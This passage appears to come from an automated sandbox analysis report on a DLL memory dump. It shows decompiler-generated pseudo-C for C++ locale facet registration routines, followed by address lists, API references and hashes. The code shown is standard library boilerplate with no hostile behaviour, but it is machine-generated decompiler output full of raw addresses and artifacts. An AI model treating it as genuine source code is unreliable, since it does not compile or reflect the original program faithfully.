																																																		E6E1C66BA(_t726 - 0x14);
																																																		return E6E1E0075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6E1D162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6E1A1438(_t625);
																																																				E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e22851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6e22c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6E1D542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6E1E0075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t691);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6e286dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t690);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6e286e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t689);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6e286dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t688);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6e286dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t687);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6e286de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t686);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6e286ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t685);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6e286db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6E1C6FD3(__eflags, _t684);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6e286dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6E1C6FD3(__eflags, _t683);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6e286dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6E1C6FD3(__eflags, _t682);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6e286dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6E1C6FD3(__eflags, _t681);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6e286df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6E1C6FD3(__eflags, _t680);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6e286df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6E1C6FD3(__eflags, _t679);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6e286dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6E1C6FD3(__eflags, _t678);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6e286df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6E1C6FD3(__eflags, _t677);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6e286dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6E1C6FD3(__eflags, _t676);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6e286dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

0x6e1cf2cf
0x6e1cf2cf
0x6e1cf2d6
0x6e1cf2e0
0x6e1cf2e5
0x6e1cf2f0
0x6e1cf2f4
0x6e1cf2f7
0x6e1cf2fc
0x6e1cf300
0x6e1cf305
0x6e1cf309
0x6e1cf34e
0x6e1cf351
0x6e1cf35d
0x6e1cf30b
0x6e1cf30d
0x6e1cf313
0x6e1cf319
0x6e1cf321
0x6e1cf324
0x6e1cf361
0x6e1cf36f
0x6e1cf374
0x6e1cf37c
0x6e1cf386
0x6e1cf38b
0x6e1cf396
0x6e1cf39a
0x6e1cf39d
0x6e1cf3a2
0x6e1cf3ab
0x6e1cf3ad
0x6e1cf3af
0x6e1cf3f4
0x6e1cf3f7
0x6e1cf403
0x6e1cf3b1
0x6e1cf3b1
0x6e1cf3b3
0x6e1cf3b9
0x6e1cf3bf
0x6e1cf3c7
0x6e1cf3ca
0x6e1cf407
0x6e1cf415
0x6e1cf41a
0x6e1cf422
0x6e1cf42c
0x6e1cf431
0x6e1cf43c
0x6e1cf440
0x6e1cf443
0x6e1cf448
0x6e1cf451
0x6e1cf453
0x6e1cf455
0x6e1cf49a
0x6e1cf49d
0x6e1cf4a9
0x6e1cf457
0x6e1cf457
0x6e1cf459
0x6e1cf45f
0x6e1cf465
0x6e1cf46d
0x6e1cf470
0x6e1cf4ad
0x6e1cf4bb
0x6e1cf4c0
0x6e1cf4c8
0x6e1cf4d2
0x6e1cf4d7
0x6e1cf4e2
0x6e1cf4e6
0x6e1cf4e9
0x6e1cf4ee
0x6e1cf4f7
0x6e1cf4f9
0x6e1cf4fb
0x6e1cf540
0x6e1cf543
0x6e1cf54f
0x6e1cf4fd
0x6e1cf4fd
0x6e1cf4ff
0x6e1cf505
0x6e1cf50b
0x6e1cf513
0x6e1cf516
0x6e1cf553
0x6e1cf561
0x6e1cf566
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf59d
0x6e1cf59f
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459
0x6e1cf3cc
0x6e1cf3cc
0x6e1cf3cf
0x6e1cf3d3
0x6e1cf3d7
0x6e1cf3e4
0x6e1cf3ec
0x6e1cf3ee
0x00000000
0x6e1cf3ee
0x6e1cf3b5
0x6e1cf3b5
0x00000000
0x6e1cf3b5
0x6e1cf3b3
0x6e1cf326
0x6e1cf326
0x6e1cf329
0x6e1cf32d
0x6e1cf331
0x6e1cf33e
0x6e1cf346
0x6e1cf348
0x00000000
0x6e1cf348
0x6e1cf30f
0x6e1cf30f
0x00000000
0x6e1cf30f
0x6e1cf30d

APIs

__EH_prolog3.LIBCMT ref: 6E1CF2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF2E0
int.LIBCPMT ref: 6E1CF2F7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF36F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1ce6041ca22d53b7ecaf6ddb73c3dde8de6099e7de59e688c75d00219f99468a
Instruction ID: 5b55dc90c2d450d8151c4fa4988c1c7b7c7d6c6ee190d8d095b3d50f87f5c9df
Opcode Fuzzy Hash: 1ce6041ca22d53b7ecaf6ddb73c3dde8de6099e7de59e688c75d00219f99468a
Instruction Fuzzy Hash: 0A113A759105189BCF01DBD4C854AFEB77AAF64B04F244809D430EB2D0DF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1CA1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t136 =  *0x6e286ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6E1A161C(0x6e286cb8);
				_t102 = _a8;
				_t50 = E6E1A171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t132, _t136, 0x14);
							E6E1C6653( &_v20, 0);
							_t137 =  *0x6e286cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6E1A161C(0x6e286cbc);
							_t109 = _a8;
							_t133 = E6E1A171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t99, _t133, _t137, 0x14);
										E6E1C6653( &_v20, 0);
										_t138 =  *0x6e286cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6E1A161C(0x6e286cc0);
										_t116 = _a8;
										_t134 = E6E1A171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6E1A1438(_t120);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6e22ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t134);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6e286cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t133);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6e286cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t132);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6e286ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

0x6e1ca1a5
0x6e1ca1ac
0x6e1ca1b6
0x6e1ca1bb
0x6e1ca1c6
0x6e1ca1ca
0x6e1ca1cd
0x6e1ca1d2
0x6e1ca1d6
0x6e1ca1db
0x6e1ca1df
0x6e1ca224
0x6e1ca227
0x6e1ca233
0x6e1ca1e1
0x6e1ca1e3
0x6e1ca1e9
0x6e1ca1ef
0x6e1ca1f7
0x6e1ca1fa
0x6e1ca237
0x6e1ca245
0x6e1ca24a
0x6e1ca252
0x6e1ca25c
0x6e1ca261
0x6e1ca26c
0x6e1ca270
0x6e1ca273
0x6e1ca278
0x6e1ca281
0x6e1ca283
0x6e1ca285
0x6e1ca2ca
0x6e1ca2cd
0x6e1ca2d9
0x6e1ca287
0x6e1ca287
0x6e1ca289
0x6e1ca28f
0x6e1ca295
0x6e1ca29d
0x6e1ca2a0
0x6e1ca2dd
0x6e1ca2eb
0x6e1ca2f0
0x6e1ca2f8
0x6e1ca302
0x6e1ca307
0x6e1ca312
0x6e1ca316
0x6e1ca319
0x6e1ca31e
0x6e1ca327
0x6e1ca329
0x6e1ca32b
0x6e1ca370
0x6e1ca373
0x6e1ca37f
0x6e1ca32d
0x6e1ca32d
0x6e1ca32f
0x6e1ca335
0x6e1ca33b
0x6e1ca343
0x6e1ca346
0x6e1ca380
0x6e1ca383
0x6e1ca391
0x6e1ca396
0x6e1ca39a
0x6e1ca39e
0x6e1ca3a3
0x6e1ca3a6
0x6e1ca3ad
0x6e1ca348
0x6e1ca348
0x6e1ca34b
0x6e1ca34f
0x6e1ca353
0x6e1ca360
0x6e1ca368
0x6e1ca36a
0x00000000
0x6e1ca36a
0x6e1ca331
0x6e1ca331
0x00000000
0x6e1ca331
0x6e1ca32f
0x6e1ca2a2
0x6e1ca2a2
0x6e1ca2a5
0x6e1ca2a9
0x6e1ca2ad
0x6e1ca2ba
0x6e1ca2c2
0x6e1ca2c4
0x00000000
0x6e1ca2c4
0x6e1ca28b
0x6e1ca28b
0x00000000
0x6e1ca28b
0x6e1ca289
0x6e1ca1fc
0x6e1ca1fc
0x6e1ca1ff
0x6e1ca203
0x6e1ca207
0x6e1ca214
0x6e1ca21c
0x6e1ca21e
0x00000000
0x6e1ca21e
0x6e1ca1e5
0x6e1ca1e5
0x00000000
0x6e1ca1e5
0x6e1ca1e3

APIs

__EH_prolog3.LIBCMT ref: 6E1CA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA1B6
int.LIBCPMT ref: 6E1CA1CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA245

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5a2a0dcaedb117b7893cddb53dad807148b1f434fc6102fd90e1128fd11c4f3b
Instruction ID: 038259684511887e7304fa9311fe947217eccf771f2b54d6811a924041824975
Opcode Fuzzy Hash: 5a2a0dcaedb117b7893cddb53dad807148b1f434fc6102fd90e1128fd11c4f3b
